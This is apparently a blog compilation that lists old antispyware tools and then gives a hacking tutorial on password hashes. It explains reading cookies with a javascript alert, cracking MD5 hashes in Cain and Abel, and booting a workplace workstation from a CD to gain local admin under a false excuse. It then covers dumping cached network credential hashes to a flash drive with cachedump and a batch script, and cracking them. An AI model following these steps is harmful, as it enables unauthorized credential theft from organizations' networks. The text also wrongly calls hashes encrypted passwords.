SpyDefense 0.9.5.118 Beta SpyDefense protects your computer against annoying and harmful software such as Spyware, Adware, Trojan horses, etc.
Arovax Shield 1.2.314 Arovax Shield is a brand new type of personal security solution that is unlike to any firewall, anti-virus or spyware remover.
freedom GUi 1.55.319X freedom GUi will find and remove spyware files from your PC, including spyware registry keys.
Arovax AntiSpyware 1.0.353 Beta Arovax AntiSpyware is an innovative, powerful, speedy and extremely easy to use Anti-Spyware scanner and remover.
Microsoft Windows AntiSpyware 1.0.701 Beta Windows AntiSpyware is a security technology that helps protect Windows users from spyware and other potentially unwanted software.
Nixory 0.3.4 Nixory,is an Anti Spyware program open source for Mozilla Firefox, planned for remove malicious data
miner. It is a software written completely in Python and PyGTK, and it is supported by all most used
platforms (Windows, Linux, Unix, MacOS, Solaris, etc...)
Ad-aware SE Personal 1.06 Ad-Aware is designed to provide advanced protection from known Data-mining, aggressive advertising, Parasites, Scumware, selected traditional Trojans, Dialers, Malware, Browser hijackers, and tracking components.
HijackThis 1.99.1 A general homepage hijackers detector and remover.
Trend Micro CWShredder 2.15 Trend Micro CWShredder is the premier tool to find and remove traces of CoolWebSearch
Spybot Search and Destroy 1.4 Spybot Search and Destroy searches your hard drive for so-called spy- or adbots.
Chapter 8: HASH
PART 1: What is hash?
Hash is an encrypted version of your password normally stored in a cookie.
An example of hash:
F95B258A1C8913697FD83DB53F597474
PART 2: How do i get the hash?
This is different for every target. But for a basic way. Type java script:alert(document.cookie) in your address bar -should be easy enough
PART 3: Cracking Hashs'
Hello Everybody, this is my first article so please be gentle.
First of all. This tutorial can be seen as an spoiler since realistic lvl 5 asks you to crack a md5 hash.
Since I'm using Cain and Abel in this tutorial, you should get it before we start. Get it from http://www.oxid.it/cain.html
Download it, install it and open it.
When you've opened it you can see the mainscreen. Click the "Cracker" tab (the one with the key).
First we have to make clear what kind of encryption we're dealing with. In this tutorial, i'll use a md5-hash, because it's very common. Actually we're using two of them, to show to ways of cracking.
nr.1 =
9DF3B01C60DF20D13843841FF0D4482C
nr.2 =
F95B258A1C8913697FD83DB53F597474
So, this is a MD5 hash, just select "MD5 Hashes" in the left screen. Now click the big blue "+" at the top bar. Insert your hash (9DF3B01C60DF20D13843841FF0D4482C) and press [Enter].
The first thing we are going to do is to dictonary attack the hash. Since the hash can't be decrypted, you have to compare it. This means you have to MD5 loads of things and check wether one of them has the same hash. Using a dictonary attack you use a list of words which will be encrypted and compared. This is a rather fast way, but since not all passwords are words, it doesn't allways work.
Right-click the hash on the big screen and select Dictonary Attack. Select a wordlist by clicking "Add". Cain and Abel has an English wordlist already encluded in the wordslists section. Select it and press ok. You can also add some more lists which google will help you find.
If you already did a attack with the same dictonary, press "Reset". Just leave the checkboxes as they are. Now press start. Since we've chosen 9DF3B01C60DF20D13843841FF0D4482C as our hash, after a while it will respond.
Plaintext of 9DF3B01C60DF20D13843841FF0D4482C is access
Attack stopped!
1 of 1 hashes cracked
This means access is the password! Got it!
If this doesn't work with your hash, try again checking al the checkboxes. Still doesn't work? Let's go the hard way.
In using this way will brute-force the hash. This means we'll encrypt en compare all combinations of the ascii tabel. In our case, you just take the standard the numbers to spare time. Otherways it might take hours, days, months or years to crack it. So select predefined -> 0123456789. Also set min to 1 and max to 6. Offcourse you can change this, but you want a quick result, don't you?
Now, just press Start and tadaa:
Plaintext of F95B258A1C8913697FD83DB53F597474 is 347782
Attack stopped!
1 of 1 hashes cracked
The password was 347782.
-The above section was written by one of my dutch friends who goes by SjaakRake
Part 4:Gaining network hashes from a standard workstation (windows)
Hey guys.
I did do a search on existing articles to see if this had been posted, but i didn't come up with anything so I guess I'll cover it.
Sometimes, when you want to extract hashes from a network, but have no access to the main server, only a terminal workstation, you have no access to the network administrative account, and thus cannot pipe the hashes from pwdump, or fgdump for that matter. When this happens you are somewhat limited in your options. However, it's possible for even the most noobish of beginners to gain local administrator access with a boot CD. often time you can do this with someone present, as you just say you need to install a program for your work, and the network wont let you. That's a good excuse, which incidentally happened to be true for me, which enabled me to find it out. I wont go into that in much detail, but the boot CD I would recommended is dreampackpl (google it, it was on the first page last time I checked complete with operation instructions) as not only can you change the administrator password or add an account, you can set it to log you in on the local machine with just a username, or set a god password, much to the same affect. it also has a logon logger, which is the only logon logger i've ever actually encountered. the tutorial that comes on the site doesn't go into much detail on those points, but its easy to figure out how to use it with a few mins of playing around, thanks to its helpful GUI.
Anyways, Windows by default logs a ms-cache hash or the last ten network users. (In case of network failure and people still needing access to a terminal.) this value can be changed in the registry. the key this is located at comes in a .txt file with cachedump, or at least it did when I downloaded it. (If its not in the download link i'm about to give you shortly and you want to know, PM me and ill be happy to PM you back with the key.)
You may download cachedump here:
http://meshier.com/2007/03/08/auditing-cac...with-cachedump/
NOTE: I have not checked this download link, I just trawled through google until I found a site offering download, as the original site doesn't allow public access of cachedump anymore.
Once you have downloaded cachedump, place its folder in your flashdrive. Then when logged in as a local administrator, navigate to the folder in CMD and run the line:
cachedump.exe >something.txt
You may change something to anything that takes your fancy, that's just the one I use. (<sarcasm>very imaginative I know 
</sarcasm>)
Now the hashes you've just piped into your flashdrive can be cracked in one of two ways, to my knowledge.
You can either download a patch for JTR.. just google for it, i think its called bigpatch or something..
Or you can crack them in Cain, which is my personal choice. Now Cain has its own ms-cache ripper, but it has to be installed and all sorts of things that you don't want to bother with. The one problem, is that it has its own format fr hashes, which is expects. We can get around this, however.
I take NO credit for the method of conversion and importing the hashes into Cain, I found this part off an article on www.irongeek.com (which I suggest you visit, if you haven't already. its a great site, with some very informative tutorials, plus the owner, one Adrian Crenshaw if memory serves, is very helpful and if you email him with any problems you have about his tutorials he tries his best to help.)
The link for this article is:
http://www.irongeek.com/i.php?page=securit...&mode=print
The part on conversion and implementing is half way down the page, but I'll do my best to explain it here as well. I would, however, like to point out that I was using cachedump before I read this article, and only used it for the conversion and addition to Cain, so I'm NOT copying .
Anyways, the brunt of that article means that you have to convert your hashes, which you can do automatically at this site:
http://mp3host.serveftp.com:8888/pages/cache.php
This server is a privatly owned one, and its never been down when I've used it, but dont be surprised if it has some downtime at times. Once youve go your converted hashes, go to Cain's program files, and when your there, youl find a file called CACHE which is a MASM listing. open this up in notepad and paste in your converted hashes and save. Load up Cain and swith to the cracker, and they should be there.
A note about ms-cache hashes:
ms-cache hashes use a much more complicated algorthym(SP?) than LM hashes, and consequently are far more difficult to crack. They are also salted, which makes rainbow tables too large and cumbersome, unless you have a supercomputer, in which case youl probably have them done anyways inside the hour . This of course, makes it far more important to have a decent wordlist while cracked them, and alse means that LM's are always preferable.
As a last point, I use batch scripts to make gaining the hashes easier, so i thought I would include them here.
Put the drive letter your flashdrive will be on the target machine on the first line.
cdhacking stuffcachedump (Hacking stuff is just the folder I have the cachedump folder in, if yours is just in the main flashdrive, ignore the hacking stuff part.)
cachedump.exe >>something.txt
I know that was a simple batch script, and that most people here could have written that themselves inside of a few seconds, but this is just for the people that are new to this sort of thing. If you are one of those people, take note that to make this work you type it into notepad, and save it as a filename.bat
As a final point, if you have ANY questions on the above article, or it is written improperly, please PM me, and I'll get back to you as soon as I am able.
-Avinash
Avinash.Gamerboy
Post a Comment